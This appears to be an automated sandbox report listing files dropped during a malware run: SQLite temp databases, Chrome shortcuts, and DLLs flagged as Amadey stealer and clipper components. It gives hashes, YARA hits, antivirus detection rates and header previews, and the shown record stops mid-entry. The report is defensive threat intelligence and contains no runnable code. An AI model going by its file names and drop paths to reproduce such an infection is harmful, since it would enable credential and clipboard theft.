                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpD849.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpD853.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpD86A.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                      Entropy (8bit):3.9802036404605685
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8HdpTxpNHbidAKZdA19ehwiZUklqehJy+3:8b7DCy
                                                                                                                                                                                                                                      MD5:A0006DD67AFEED2A9EBEE1DB724970C5
                                                                                                                                                                                                                                      SHA1:94D1A4FCC55F66BC64FC226C7186C49BE81000F4
                                                                                                                                                                                                                                      SHA-256:037BF298C657B0E5285EF93B61D298BEEE86F8514F5EF2BA66092FAEBE380178
                                                                                                                                                                                                                                      SHA-512:462D116259454DAF86E041D0733F7707718F0F428C87A725BCF92ED5EF4931B7D3CD66AD26AB5434AB82059B5188304FE3FB7D7EDF23B0FFC55A49F5EFEA1DF7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............hZ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                      Entropy (8bit):3.9937518083094035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8KdpTxpNHbidAKZdA1weh/iZUkAQkqehyy+2:8o7x9Qjy
                                                                                                                                                                                                                                      MD5:A091690B7687A8E1CED0BC4CB0124CC5
                                                                                                                                                                                                                                      SHA1:1BB2177F10084EAB7033D784C0EA312EBC4FDDA5
                                                                                                                                                                                                                                      SHA-256:0BEB85F900BDED86D09046FBDE171032AD16D549FD0267756FF2B855E4F01CB3
                                                                                                                                                                                                                                      SHA-512:5253ED2FC84D1B50288AD467CD6A22A7AE1B209F5B6A4D7323D4D0E9448A9105543E18581C672FF7DCBFF6C2CA46FEAFBCE8D06EA0B1B4AEC6063060B874FF61
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............hZ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2693
                                                                                                                                                                                                                                      Entropy (8bit):4.006248144561485
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8xydpTxpsHbidAKZdA14tseh7sFiZUkmgqeh7sky+BX:8xQ7ynmy
                                                                                                                                                                                                                                      MD5:23A7023EE9C3A64C983E887CB8457C6D
                                                                                                                                                                                                                                      SHA1:F27A403757FC01EDD5CC013265BCB68B3E87D144
                                                                                                                                                                                                                                      SHA-256:D4EFC43BA888EE47C9047CCB9529F03B61C99680E4BFEF328AA0A0D4AAB9FD6D
                                                                                                                                                                                                                                      SHA-512:CB987CDE967E47CA0A38953A885003E1B82ED84F9F05EB4A43022C68A8F2E128C9DCF1263ADB1F882A947077480F7084A77B40F8CBA8CD5F27BD7E6A6E7EA2E5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............hZ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2681
                                                                                                                                                                                                                                      Entropy (8bit):3.9909222948315253
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8odpTxpNHbidAKZdA1vehDiZUkwqeh+y+R:8e7y8y
                                                                                                                                                                                                                                      MD5:A30DD319B16171964F31D8C3C3759314
                                                                                                                                                                                                                                      SHA1:CFCF154147A8E20F81C8C0B759DE504214B40DBD
                                                                                                                                                                                                                                      SHA-256:3FF4E05704B30854E16F9F1BBA24C876FAC0762A2337C5FF7246853A858610FB
                                                                                                                                                                                                                                      SHA-512:900A59A3B8A9A2D3BAACB913FAE258E92A3981D010EC69F47818384148AFFF201EFB8F4B740A218A44F48C886A59CC37EC7063D0CFF260916EEDE196C488AB4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....g......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............hZ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2681
                                                                                                                                                                                                                                      Entropy (8bit):3.983864480051781
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8rdpTxpNHbidAKZdA1hehBiZUk1W1qeh4y+C:8v7C9Yy
                                                                                                                                                                                                                                      MD5:17DF014CD2C48DF90CE0C2191966532F
                                                                                                                                                                                                                                      SHA1:591DE1AA94BE135611F62C5379FD4497A26CF2C4
                                                                                                                                                                                                                                      SHA-256:F5ADC30964850F4FBD0D12407BA612951A6AAE0BC9144385FAB0D337A59FF441
                                                                                                                                                                                                                                      SHA-512:55A06C0D9E923D6A963630286185D19F42D35D4617769768FEEBFB1901619370E564D1A3694286C6F5D6D1DBD261FA3768818048AC4722C4CC6F9C097D156497
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....;.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............hZ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2683
                                                                                                                                                                                                                                      Entropy (8bit):3.9983661503885397
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8wdpTxpNHbidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8m78T/TbxWOvTbmy7T
                                                                                                                                                                                                                                      MD5:1721FCEF73270FB994450587DBF92C88
                                                                                                                                                                                                                                      SHA1:71C5599092B7029DF8C208FB5A246DBB40AA686E
                                                                                                                                                                                                                                      SHA-256:27757CB1B9CBB63872BBA383962877AD33FD78A47EE2444F69B8A15731759A31
                                                                                                                                                                                                                                      SHA-512:0499B8B74C64942DF46D486F986B20FCC5A05E492801288834ED4FFBF640BC13D3BB55A2830946FE95630F33A885E6E5B0050BF2042A9F4793000830BF5E3511
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....X......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............hZ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400158525810517
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                                                                                                                                                      MD5:726CD06231883A159EC1CE28DD538699
                                                                                                                                                                                                                                      SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                                                                                                                                                      SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                                                                                                                                                      SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L...j..e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460494158653329
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                                                                                                                                                      MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                                                                                                                                                      SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                                                                                                                                                      SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                                                                                                                                                      SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 78%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d...i..e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400356358225577
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
                                                                                                                                                                                                                                      MD5:154C3F1334DD435F562672F2664FEA6B
                                                                                                                                                                                                                                      SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
                                                                                                                                                                                                                                      SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
                                                                                                                                                                                                                                      SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
